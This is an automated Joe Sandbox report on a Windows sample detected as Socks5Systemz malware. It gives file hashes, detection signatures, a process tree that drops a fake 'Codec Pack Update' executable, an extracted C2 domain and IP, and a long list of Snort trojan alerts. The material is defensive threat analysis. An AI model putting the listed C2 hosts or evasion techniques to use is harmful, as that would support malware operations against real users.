Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0RWRPBSuDx.exe

Overview

General Information

Sample name:0RWRPBSuDx.exe
renamed because original name is a hash value
Original sample name:d19197438a7371baaac62fec8dabb3d7.exe
Analysis ID:1417492
MD5:d19197438a7371baaac62fec8dabb3d7
SHA1:3252c13b0af9e6a71c11bf9ed37122b3d76064bd
SHA256:e2de4097b80b8480f28f08bc4fc238dca38dbdcb6bbb0c77a83e3753cb03dcf7
Tags:32exe
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Socks5Systemz
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 0RWRPBSuDx.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\0RWRPBSuDx.exe" MD5: D19197438A7371BAAAC62FEC8DABB3D7)
    • 0RWRPBSuDx.tmp (PID: 6940 cmdline: "C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp" /SL5="$20420,1594531,54272,C:\Users\user\Desktop\0RWRPBSuDx.exe" MD5: D8E53E1B8EA1B12BC3F40BB9F8B14F38)
      • codecpackupdate.exe (PID: 7040 cmdline: "C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -i MD5: 0E347C627EFDED3BF78AFA21FF8B54D3)
      • codecpackupdate.exe (PID: 7084 cmdline: "C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -s MD5: 0E347C627EFDED3BF78AFA21FF8B54D3)
  • cleanup

Malware Configuration

Threatname: Socks5Systemz

{"C2 list": ["bvuppwf.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    00000003.00000002.2867940792.0000000000731000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: codecpackupdate.exe PID: 7084JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:03/29/24-12:59:10.764656
        SID:2050112
        Source Port:49755
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:35.421196
        SID:2049467
        Source Port:49787
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:59.675457
        SID:2049467
        Source Port:49815
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:28.814022
        SID:2049467
        Source Port:49778
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:58.279145
        SID:2050112
        Source Port:49740
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:52.205310
        SID:2049467
        Source Port:49806
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:48.200098
        SID:2050112
        Source Port:49801
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:44.183959
        SID:2049467
        Source Port:49796
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:29.458062
        SID:2050112
        Source Port:49779
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:54.762452
        SID:2050112
        Source Port:49810
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:25.184508
        SID:2050112
        Source Port:49773
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:17.561359
        SID:2049467
        Source Port:49763
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:32.211512
        SID:2050112
        Source Port:49782
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:10.122007
        SID:2049467
        Source Port:49754
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:21.394081
        SID:2049467
        Source Port:49769
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:03.387980
        SID:2050112
        Source Port:49746
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:37.749118
        SID:2049467
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:24.138039
        SID:2049467
        Source Port:49772
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:47.153192
        SID:2049467
        Source Port:49800
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:31.562211
        SID:2049467
        Source Port:49781
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:18.201077
        SID:2050112
        Source Port:49764
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:57.434224
        SID:2049467
        Source Port:49736
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:25.828412
        SID:2050112
        Source Port:49774
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:44.826160
        SID:2050112
        Source Port:49797
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:38.599677
        SID:2050112
        Source Port:49791
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:28.169308
        SID:2049467
        Source Port:49777
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:32.211512
        SID:2049467
        Source Port:49782
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:01.144442
        SID:2050112
        Source Port:49817
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:11.403065
        SID:2050112
        Source Port:49756
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:14.168811
        SID:2049467
        Source Port:49759
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:45.464018
        SID:2050112
        Source Port:49798
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:00.317751
        SID:2050112
        Source Port:49816
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:48.200098
        SID:2049467
        Source Port:49801
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:52.843294
        SID:2049467
        Source Port:49807
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:17.561359
        SID:2050112
        Source Port:49763
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:09.075777
        SID:2049467
        Source Port:49753
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:23.090769
        SID:2049467
        Source Port:49771
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:55.404429
        SID:2050112
        Source Port:49811
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:36.058657
        SID:2049467
        Source Port:49788
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:02.340536
        SID:2050112
        Source Port:49745
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:39.978368
        SID:2050112
        Source Port:49792
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:31.562211
        SID:2050112
        Source Port:49781
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:00.626740
        SID:2049467
        Source Port:49743
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:13.121896
        SID:2049467
        Source Port:49758
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:24.138039
        SID:2050112
        Source Port:49772
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:26.471385
        SID:2050112
        Source Port:49775
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:39.978368
        SID:2049467
        Source Port:49792
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:18.201077
        SID:2049467
        Source Port:49764
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:19.483683
        SID:2050112
        Source Port:49766
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:22.033829
        SID:2049467
        Source Port:49770
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:01.268339
        SID:2050112
        Source Port:49744
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:34.777689
        SID:2049467
        Source Port:49786
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:37.106191
        SID:2049467
        Source Port:49789
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:07.153408
        SID:2050112
        Source Port:49750
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:43.547929
        SID:2049467
        Source Port:49795
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:21.394081
        SID:2050112
        Source Port:49769
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:49.480506
        SID:2050112
        Source Port:49803
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:46.108211
        SID:2050112
        Source Port:49799
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:44.183959
        SID:2050112
        Source Port:49796
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:01.144442
        SID:2049467
        Source Port:49817
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:56.055877
        SID:2050112
        Source Port:49812
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:58.279145
        SID:2049467
        Source Port:49740
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:52.205310
        SID:2050112
        Source Port:49806
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:16.918885
        SID:2049467
        Source Port:49762
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:44.826160
        SID:2049467
        Source Port:49797
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:59.965425
        SID:2050112
        Source Port:49742
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:36.058657
        SID:2050112
        Source Port:49788
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:02.340536
        SID:2049467
        Source Port:49745
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:59.031292
        SID:2050112
        Source Port:49814
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:42.903229
        SID:2050112
        Source Port:49794
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:09.075777
        SID:2050112
        Source Port:49753
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:07.805203
        SID:2049467
        Source Port:49751
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:53.482569
        SID:2050112
        Source Port:49808
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:25.184508
        SID:2049467
        Source Port:49773
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:20.124059
        SID:2049467
        Source Port:49767
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:03.080619
        SID:2050112
        Source Port:49820
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:11.403065
        SID:2049467
        Source Port:49756
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:32.856145
        SID:2050112
        Source Port:49783
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:28.169308
        SID:2050112
        Source Port:49777
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:54.762452
        SID:2049467
        Source Port:49810
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:50.109189
        SID:2049467
        Source Port:49804
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:02.442251
        SID:2050112
        Source Port:49819
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:57.434224
        SID:2050112
        Source Port:49736
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:08.435175
        SID:2050112
        Source Port:49752
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:01.795965
        SID:2049467
        Source Port:49818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:56.055877
        SID:2049467
        Source Port:49812
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:13.121896
        SID:2050112
        Source Port:49758
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:33.499589
        SID:2049467
        Source Port:49784
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:15.452590
        SID:2050112
        Source Port:49761
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:54.123875
        SID:2049467
        Source Port:49809
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:49.480506
        SID:2049467
        Source Port:49803
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:00.626740
        SID:2050112
        Source Port:49743
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:14.816268
        SID:2049467
        Source Port:49760
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:50.109189
        SID:2050112
        Source Port:49804
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:12.050126
        SID:2049467
        Source Port:49757
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:22.033829
        SID:2050112
        Source Port:49770
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:27.122910
        SID:2050112
        Source Port:49776
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:41.029454
        SID:2049467
        Source Port:49793
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:05.059289
        SID:2049467
        Source Port:49748
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:20.124059
        SID:2050112
        Source Port:49767
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:26.471385
        SID:2049467
        Source Port:49775
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:06.106340
        SID:2050112
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:19.483683
        SID:2049467
        Source Port:49766
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:51.153063
        SID:2050112
        Source Port:49805
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:48.841670
        SID:2049467
        Source Port:49802
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:18.842102
        SID:2049467
        Source Port:49765
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:30.918916
        SID:2050112
        Source Port:49780
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:59.965425
        SID:2049467
        Source Port:49742
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:02.442251
        SID:2049467
        Source Port:49819
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:12.050126
        SID:2050112
        Source Port:49757
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:34.137988
        SID:2050112
        Source Port:49785
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:16.918885
        SID:2050112
        Source Port:49762
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:32.856145
        SID:2049467
        Source Port:49783
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:58.916637
        SID:2049467
        Source Port:49741
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:27.122910
        SID:2049467
        Source Port:49776
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:56.945215
        SID:2049467
        Source Port:49813
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:46.108211
        SID:2049467
        Source Port:49799
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:34.777689
        SID:2050112
        Source Port:49786
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:20.762171
        SID:2050112
        Source Port:49768
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:07.805203
        SID:2050112
        Source Port:49751
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:42.903229
        SID:2049467
        Source Port:49794
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:33.499589
        SID:2050112
        Source Port:49784
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:35.421196
        SID:2050112
        Source Port:49787
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:03.387980
        SID:2049467
        Source Port:49746
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:01.795965
        SID:2050112
        Source Port:49818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:08.435175
        SID:2049467
        Source Port:49752
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:41.029454
        SID:2050112
        Source Port:49793
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:28.814022
        SID:2050112
        Source Port:49778
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:15.452590
        SID:2049467
        Source Port:49761
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:47.153192
        SID:2050112
        Source Port:49800
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:06.106340
        SID:2049467
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:10.764656
        SID:2049467
        Source Port:49755
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:37.749118
        SID:2050112
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:03.080619
        SID:2049467
        Source Port:49820
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:58.916637
        SID:2050112
        Source Port:49741
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:54.123875
        SID:2050112
        Source Port:49809
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:59.031292
        SID:2049467
        Source Port:49814
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:53.482569
        SID:2049467
        Source Port:49808
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:59.675457
        SID:2050112
        Source Port:49815
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:45.464018
        SID:2049467
        Source Port:49798
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:20.762171
        SID:2049467
        Source Port:49768
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:48.841670
        SID:2050112
        Source Port:49802
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:23.090769
        SID:2050112
        Source Port:49771
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:05.059289
        SID:2050112
        Source Port:49748
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:51.153063
        SID:2049467
        Source Port:49805
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:38.599677
        SID:2049467
        Source Port:49791
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:18.842102
        SID:2050112
        Source Port:49765
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:55.404429
        SID:2049467
        Source Port:49811
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:25.828412
        SID:2049467
        Source Port:49774
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:00.317751
        SID:2049467
        Source Port:49816
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:14.816268
        SID:2050112
        Source Port:49760
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:43.547929
        SID:2050112
        Source Port:49795
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:01.268339
        SID:2049467
        Source Port:49744
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:56.945215
        SID:2050112
        Source Port:49813
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:30.918916
        SID:2049467
        Source Port:49780
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:10.122007
        SID:2050112
        Source Port:49754
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:37.106191
        SID:2050112
        Source Port:49789
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:07.153408
        SID:2049467
        Source Port:49750
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:52.843294
        SID:2050112
        Source Port:49807
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:34.137988
        SID:2049467
        Source Port:49785
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:14.168811
        SID:2050112
        Source Port:49759
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:29.458062
        SID:2049467
        Source Port:49779
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: 0RWRPBSuDx.exeAvira: detected
        Antivirus detection for dropped file
        Source: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exeAvira: detection malicious, Label: HEUR/AGEN.1324697
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeAvira: detection malicious, Label: HEUR/AGEN.1324697
        Found malware configuration
        Source: codecpackupdate.exe.7084.3.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["bvuppwf.com"]}
        Multi AV Scanner detection for domain / URL
        Source: http://45.142.214.240/Virustotal: Detection: 7%Perma Link
        Multi AV Scanner detection for dropped file
        Source: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exeVirustotal: Detection: 38%Perma Link
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeVirustotal: Detection: 38%Perma Link
        Multi AV Scanner detection for submitted file
        Source: 0RWRPBSuDx.exeVirustotal: Detection: 9%Perma Link
        Machine Learning detection for dropped file
        Source: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0045B4AC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045B4AC
